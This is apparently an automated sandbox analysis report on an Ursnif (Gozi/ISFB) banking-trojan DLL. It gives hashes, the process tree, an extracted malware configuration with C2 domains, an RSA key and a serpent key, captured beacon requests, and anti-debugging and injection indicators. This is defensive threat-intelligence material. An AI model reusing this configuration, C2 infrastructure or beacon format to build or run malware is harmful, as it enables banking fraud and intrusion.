Windows Analysis Report B6VQd36tt6.dll

Overview

General Information

Sample Name: B6VQd36tt6.dll
Analysis ID: 500299
MD5: c4c060ec6b1e42d70972d0af66a04e66
SHA1: 3ef84847fceb31b8814c12c94c57c72a5281d6f5
SHA256: 47715e425398283d53019c270311ad0c709f660048d2f884d5116d80b983743f
Tags: BRT, dll, geo, Gozi, ISFB, ITA, Ursnif
Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3272 cmdline: loaddll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 3144 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5692 cmdline: rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5256 cmdline: rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6284 cmdline: rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 832 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 2772 cmdline: rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1984 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.loaddll32.exe.6f030000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.0.rundll32.exe.6f030000.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.2d094a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.2.rundll32.exe.6f030000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.2.rundll32.exe.4c394a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (configuration identical to the one listed under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: B6VQd36tt6.dll, Virustotal: Detection: 16%
Source: B6VQd36tt6.dll, ReversingLabs: Detection: 24%
Multi AV Scanner detection for domain / URL
Source: areuranel.website, Virustotal: Detection: 6%
Source: breuranel.website, Virustotal: Detection: 6%
Source: https://areuranel.website/, Virustotal: Detection: 6%
Source: B6VQd36tt6.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown, HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49761, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49763, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49777, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.98.199.194:443 -> 192.168.2.6:49778, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.6:49779, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49780, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.97.178.34:443 -> 192.168.2.6:49781, version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.6:49782, version: TLS 1.2
Source: B6VQd36tt6.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.751009999.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.753309847.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584623901.000000006F0AB000.00000002.00020000.sdmp, B6VQd36tt6.dll
Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.97.178.34 187
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.97.178.98 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 13.82.28.61 187
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View, IP Address: 40.97.161.50
Source: global traffic, HTTP traffic detected: GET /mail/liopolo/g1XXBsAxpar6N9kYzRnrf3/OQX2uNrM13y9W/Ob_2BksA/x8bQpkLjYsruIhPFJi3ZErA/tgPZIh6fnf/T9Sy6miArqkO107Ts/8FGy1p_2BKcs/IbQATX6Vpot/p9H1S_2FBpU5gj/XH9RZi7pSy90EfKCN0xoX/QAyaPWXD19YFLug2/I6ErSp8Uq8hZ5g3/WwbSra7jr8/n3VI4u.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
Source: global traffic, HTTP traffic detected: GET /mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: msn.com
Source: global traffic, HTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
Source: global traffic, HTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
Source: global traffic, HTTP traffic detected: GET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.office365.com
Source: global traffic, HTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: outlook.com
Source: global traffic, HTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 5c2fdc38-15df-1f17-392b-827de99c6af9Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR0101CU002.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR0101CA0050.EURPRD01.PROD.EXCHANGELABS.COMX-CalculatedBETarget: VI1PR06MB6510.eurprd06.prod.outlook.comX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: ONwvXN8VFx85K4J96Zxq+Q.1.1X-FEServer: VI1PR0101CA0050X-Powered-By: ASP.NETX-FEServer: AS9PR06CA0070Date: Mon, 11 Oct 2021 20:36:17 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 8895e295-2c4a-97c0-6a4c-33e5a4e5782aStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR08CU014.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR08CA0260.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: VI1PR0401MB2509.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: leKViEoswJdqTDPlpOV4Kg.1.1X-FEServer: VI1PR08CA0260X-Powered-By: ASP.NETX-FEServer: AM7PR04CA0027Date: Mon, 11 Oct 2021 20:36:19 GMTConnection: close
                      Source: unknown DNS traffic detected: queries for: msn.com
                      Source: unknown HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49761 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.6:49763 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49777 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 52.98.199.194:443 -> 192.168.2.6:49778 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.6:49779 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.6:49780 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 52.97.178.34:443 -> 192.168.2.6:49781 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.6:49782 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif

                      E-Banking Fraud:

                      Yara detected Ursnif

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: B6VQd36tt6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0321B40_2_6F0321B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0456000_2_6F045600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F07D6300_2_6F07D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F07B5970_2_6F07B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F08A2B10_2_6F08A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303AF243_2_0303AF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03032B763_2_03032B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03034C403_2_03034C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0456003_2_6F045600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F088DAF3_2_6F088DAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F06E8C03_2_6F06E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0456004_2_6F045600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F08A2B14_2_6F08A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F06E8C04_2_6F06E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6F06ABD1 appears 86 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F06ABD1 appears 113 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F078487 appears 34 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F06AEC0 appears 36 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0313B8 GetProcAddress,NtCreateSection,memset,0_2_6F0313B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0315C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6F0315C6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031273 NtMapViewOfSection,0_2_6F031273
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0323D5 NtQueryVirtualMemory,0_2_6F0323D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03035D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_03035D10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303B149 NtQueryVirtualMemory,3_2_0303B149
                      Source: B6VQd36tt6.dllVirustotal: Detection: 16%
                      Source: B6VQd36tt6.dllReversingLabs: Detection: 24%
                      Source: B6VQd36tt6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 832
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 644
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B10.tmp
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@14/12@14/6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03034A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_03034A03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6284
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2772
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: B6VQd36tt6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: B6VQd36tt6.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.751009999.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.753309847.000000006F0AB000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.584623901.000000006F0AB000.00000002.00020000.sdmp, B6VQd36tt6.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F0321A3 push ecx; ret 0_2_6F0321B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F032150 push ecx; ret 0_2_6F032159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F06AB9A push ecx; ret 0_2_6F06ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303AF13 push ecx; ret 3_2_0303AF23
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303ABE0 push ecx; ret 3_2_0303ABE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F06AB9A push ecx; ret 3_2_6F06ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F06AB9A push ecx; ret 4_2_6F06ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293CA9C push 3C0293CCh; retf 5_2_0293CAA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C7A8 push eax; iretd 5_2_0293C7B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C954 push edx; retf 5_2_0293C955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293CEDA push esp; iretd 5_2_0293CF35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293CEF2 push esp; iretd 5_2_0293CF35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C8F7 pushad ; iretd 5_2_0293C8F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C8FC pushad ; iretd 5_2_0293C8FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C8E0 push eax; iretd 5_2_0293C8E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0293C7E4 push eax; iretd 5_2_0293C7E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031DE5 LoadLibraryA,GetProcAddress,0_2_6F031DE5

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.610696920.0000000004576000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.629141860.000000000521E000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.630848345.00000000045E2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F076CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031DE5 LoadLibraryA,GetProcAddress,0_2_6F031DE5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F08C325 mov eax, dword ptr fs:[00000030h]0_2_6F08C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F08C325 mov eax, dword ptr fs:[00000030h]3_2_6F08C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F098861 mov eax, dword ptr fs:[00000030h]3_2_6F098861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DDFDA mov eax, dword ptr fs:[00000030h]3_2_6F0DDFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DDBB5 push dword ptr fs:[00000030h]3_2_6F0DDBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F0DDEAA mov eax, dword ptr fs:[00000030h]3_2_6F0DDEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F08C325 mov eax, dword ptr fs:[00000030h]4_2_6F08C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F098861 mov eax, dword ptr fs:[00000030h]4_2_6F098861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0DDFDA mov eax, dword ptr fs:[00000030h]4_2_6F0DDFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0DDEAA mov eax, dword ptr fs:[00000030h]4_2_6F0DDEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F0DDBB5 push dword ptr fs:[00000030h]4_2_6F0DDBB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F076CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F076CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F06B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6F06B316
